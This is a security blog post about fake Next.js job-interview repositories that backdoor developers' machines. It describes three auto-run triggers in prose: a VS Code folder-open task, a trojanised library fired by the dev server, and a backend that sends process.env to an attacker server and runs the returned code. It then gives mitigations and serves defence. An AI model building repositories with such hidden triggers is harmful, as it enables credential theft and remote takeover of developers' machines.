The API Guys
Dark background with a security warning icon representing malicious Next.js repositories used in fake job interview attacks against developers
·6 min read·The API Guys

Fake Next.js Job Tests Are Backdooring Developer Devices

SecurityNext.jsSupply ChainDeveloper Security

If you have been through a technical interview recently, you have almost certainly been handed a repository to clone and run. It is standard practice: the hiring company shares a codebase, you work through a coding challenge, and everyone treats the workflow as routine. That routine is now an active attack surface.

Microsoft Defender researchers have published an analysis of a coordinated campaign targeting software developers through malicious repositories disguised as legitimate Next.js projects and technical assessment materials. The attacker's goal is remote code execution on developer machines, data exfiltration, and the installation of additional payloads. The attack activates automatically during your normal development workflow, before you have written a single line of code.

How It Works

The attacker creates fake web application projects built with Next.js and distributes them as coding projects during job interviews or technical assessments. Researchers initially identified a repository hosted on Bitbucket, but discovered multiple repositories sharing code structure, loader logic, and naming patterns, indicating a coordinated operation rather than an isolated incident.

When a developer clones the repository and opens it locally, following what appears to be a perfectly normal workflow, malicious JavaScript executes automatically. The script downloads a JavaScript backdoor from the attacker's server and runs it directly in memory within the Node.js process. The result is remote code execution on the developer's machine.

What makes this campaign particularly effective is the number of execution triggers embedded in the repository. Microsoft identified three separate mechanisms, any one of which is sufficient to compromise the target.

Three Ways to Get Compromised Before You Start

The VS Code trigger. The repository contains a .vscode/tasks.json file configured with runOn: "folderOpen". In VS Code, this setting executes a Node script automatically as soon as you open the project folder and mark it as trusted. The word "trusted" carries particular weight here: VS Code's Workspace Trust feature is designed to let users mark a folder safe before running tasks. If you open the project folder and click "Yes, I trust the authors," execution happens immediately.

The dev server trigger. When you run npm run dev, a trojanised asset (a modified JavaScript library within the project) decodes a hidden URL, fetches a loader from a remote server, and executes it in memory. This trigger fires during what every Next.js developer does as the first step: starting the development server.

The backend startup trigger. When the backend module starts, it decodes a base64-encoded endpoint from the .env file, sends the entire contents of process.env to the attacker's server, receives JavaScript in response, and executes it using new Function(). This is particularly destructive because process.env contains everything in your local environment: API keys, tokens, database URLs, service credentials stored for convenience during local development.

What Happens After Infection

The initial payload (Stage 1) profiles the compromised machine and registers it with a command-and-control endpoint, polling the server at fixed intervals for instructions.

If the attacker chooses to proceed, Stage 2 delivers a tasking controller that connects to a separate C2 server, checks for tasks, executes supplied JavaScript in memory, and tracks spawned processes. The payload also supports file enumeration, directory browsing, and staged file exfiltration.

The result is full remote access to the developer's machine for as long as the attacker maintains it, with no indication to the developer that anything unusual has occurred.

Why Developers Are the Target

Developer machines are unusually valuable targets. They typically hold credentials for cloud platforms, access tokens for source code repositories, private keys, database connection strings for staging and sometimes production environments, and SSH keys that may reach internal infrastructure. A compromised developer laptop is frequently a direct path into the company the developer works for.

The job interview context makes this attack particularly clever. Candidates are naturally cautious about the companies they apply to, but they rarely apply the same scrutiny to the technical materials those companies send them. Cloning and running a project feels like normal, professional behaviour. The social engineering cost is nearly zero.

This follows a broader pattern of attackers targeting developer workflows rather than end users. We covered a related campaign last year in our post on supply chain attacks via npm packages. In both cases, the attack surface is the developer's own tools and habits.

Mitigations Worth Implementing Now

Microsoft recommends the following in their report. We have added context where relevant.

Use VS Code Workspace Trust properly. Workspace Trust exists for exactly this scenario. When you open a project from an unfamiliar source, choose Restricted Mode rather than granting full trust. In Restricted Mode, tasks.json files and other workspace-level automation are disabled until you explicitly enable them. This neutralises the first trigger entirely.

Review .vscode/tasks.json before trusting any project. If a repository from an unfamiliar source contains tasks configured to run on folder open, that is unusual. Legitimate assessment projects almost never need this. Treat it as a red flag.

Minimise secrets on developer endpoints. Long-lived API keys and tokens stored in local .env files represent significant exposure. Where possible, use short-lived tokens with the least required privileges. If your development workflow can tolerate it, consider using tools like Doppler or similar to avoid storing sensitive credentials directly on disk.

Audit what is in your process.env. The backend trigger exfiltrates your entire environment on startup. Run through what your local .env files contain and consider which credentials would be damaging if leaked. Any credential that provides access beyond the local development context is a priority for rotation to short-lived alternatives.

Be sceptical of repositories from technical assessments. This is a hard cultural shift in an industry that has normalised sharing code freely, but if you receive a repository as part of a hiring process, take a moment to review its structure before running it. Check for .vscode/tasks.json, unusual dependencies in package.json, and modified or obfuscated library files before starting the dev server.

Enable Attack Surface Reduction rules on Windows. Microsoft's ASR rules can block a number of the behaviours this malware relies on, including execution of JavaScript from unusual process chains. If your development environment runs on Windows, these are worth enabling.

A Note on Trust

The software development industry runs on an enormous amount of implicit trust: trust in packages pulled from npm, trust in code shared via GitHub, trust in the assessment materials sent over by a recruiter. That trust is legitimate and necessary. The open source ecosystem would not function without it.

But implicit trust should have limits, and those limits should be enforced by tooling rather than by hoping developers remember to be cautious. VS Code's Workspace Trust feature is there precisely because running arbitrary code on open is a risk. Using it properly costs almost nothing and eliminates a real attack vector.

If you are a developer who handles technical assessments for your company and you want to discuss what a secure developer onboarding or assessment setup looks like, get in touch.

Ready to Start Your Project?

Get in touch with our Leeds-based team to discuss your Laravel or API development needs.